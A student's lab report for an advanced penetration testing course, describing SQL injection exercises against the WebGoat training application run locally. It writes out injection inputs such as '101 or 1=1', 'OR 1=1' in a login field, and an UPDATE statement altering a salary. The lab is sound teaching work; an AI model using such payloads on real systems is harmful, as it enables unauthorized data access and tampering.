COMP 357 Advanced Penetration Testing

Lab 3 SQL Injection

Kimberly Anderson
Setup: After installing Java and WebGoat, in the command line I issued java jar WebGoat6.0.1-war-exec.jar to initiate WebGoat (Fig.1). Then in the Windows Explorer browser in the
URL I typed localhost:8080/WebGoat and logged in using guest/guest (Fig.2).

Fig.1

Fig.2
Injection Flaws
Numeric SQL Injection: Within the programming code for the task where the line SELECT *
FROM weather_data WHERE station = 101 is located; if I changed the 101 to 101 or 1=1
which allows the code to be read as true for each of the weather stations (Fig.3).

Fig.3

String SQL Injection: In the entry box any name or word can be enter as long as the variable
1=1 present which makes any name true (Fig.4).

Fig.4
Modify Data and Add Data: In the data input, if the argument contains UPDATE saleriad SET
salary=999999 WHERE userid=jsmith, no matter which name is input the user name jsmith
the arguement will be true and the salary will update to 999999 (Fig.5).

Fig.5
Blind Numeric SQL Injection: By altering the code to allow the account number to be any
number, all numbers will be true (Fig.5&6)

Fig.5

Fig.6
Blind String SQL Injection: By changing the string of text to compare characters, the argument
will check to see if the account name is between certain character lengths and letter combinations
(Fig.7&8).

Fig.7

Fig.8
SQL Injection Stage 1: Using the OWASP ZAP program, I broke the injection then on the
WebGoat injection login field I enter a random string of numbers and selected login. Now in
the OWASP break window the employee ID, password and action are displayed where I can
make modifications. I changed the password to OR 1=1 which makes any password enter
true (Fig.9&10).

Fig.9

Fig.10
SQL Injection Stage 3: By altering the employee ID to ready 101 OR 1=1 ORDER BY salary
desc the 1=1 ORDER BY salary desc overrules the Larry ID 101 to display the employee with
the highest salary (Fig.11&12).

Fig.11

Fig.12